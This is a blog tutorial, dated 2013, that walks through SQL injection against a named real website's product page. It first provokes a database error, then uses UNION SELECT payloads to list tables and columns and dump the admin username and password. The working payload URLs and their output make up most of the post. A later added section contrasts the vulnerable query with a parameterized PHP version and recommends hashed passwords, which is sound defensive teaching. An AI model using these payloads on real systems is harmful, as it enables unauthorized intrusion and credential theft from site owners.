Sunday, December 29, 2013

Tut: appending =-1148952776'

Step 1: http://hamu.com.cn/webpage/product_detail.php?id=1148952776
We usually add a ' or a -, but this kind of page does not react to either one on its own. This type is harder, so we try adding both - and ' to see what happens, and now it errors.
Step 2: http://hamu.com.cn/webpage/product_detail.php?id=-1148952776'
Result:
Database error: Invalid SQL: SELECT * FROM webmagic_info WHERE info_id='-1148952776''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1148952776''' at line 1)
Session halted.
Step 3: http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' union select 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()-- -

Result:
ProductID: 2
Description:

account_id,account_name,account_pwd,account_dept,account_lastlogin,account_lastloginfrom,account_type,account_status,account_lastpwd
Step 4: http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database() and table_name=0x7765626d616769635f75736572-- -

Result:
ProductID: 2
Description:

id,username,password
Step 5: http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(username,0x2f,password))),6,7,8,9,10,11,12,13 from webmagic_user-- -
Result:
ProductID: 2
Description:

admin/admin
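
The error in step 2 shows the id parameter being pasted into SELECT * FROM webmagic_info WHERE info_id='...' and the database error being printed to the visitor. The following added example (not from the original post and not the site's code) contrasts that pattern with a validated, parameterized lookup that keeps errors server-side; it assumes an in-memory SQLite database through PDO so it runs offline, and the title column, the row contents and the function names are constructed.

```php
<?php
// Added example, not the site's code. The table name and info_id column come
// from the error message above; title, the row and function names are assumed.
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec("CREATE TABLE webmagic_info (info_id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO webmagic_info VALUES (1148952776, 'Sample product')");

// Vulnerable pattern: the id is pasted between quotes, so a stray quote
// changes the statement, and the driver error is echoed to the visitor.
function lookup_vulnerable(PDO $pdo, string $id): string
{
    try {
        $sql = "SELECT * FROM webmagic_info WHERE info_id='" . $id . "'";
        $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
        return $row ? $row['title'] : 'not found';
    } catch (PDOException $e) {
        return 'Database error: ' . $e->getMessage(); // leaks query details
    }
}

// Hardened pattern: validate the type, bind the value, log errors server-side.
function lookup_hardened(PDO $pdo, string $id): string
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return 'not found';            // same response for any malformed id
    }
    try {
        $stmt = $pdo->prepare('SELECT title FROM webmagic_info WHERE info_id = ?');
        $stmt->execute([$n]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ? $row['title'] : 'not found';
    } catch (PDOException $e) {
        error_log('product lookup failed: ' . $e->getMessage());
        return 'not found';            // no SQL text reaches the page
    }
}

// Constructed inputs: a valid id, then the value used in step 2.
foreach (['1148952776', "-1148952776'"] as $id) {
    printf("%-14s vulnerable: %s\n", $id, lookup_vulnerable($pdo, $id));
    printf("%-14s hardened:   %s\n", $id, lookup_hardened($pdo, $id));
}
```

Step 5 also returns the password in clear text; storing only the output of password_hash() limits what a leaked row exposes.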
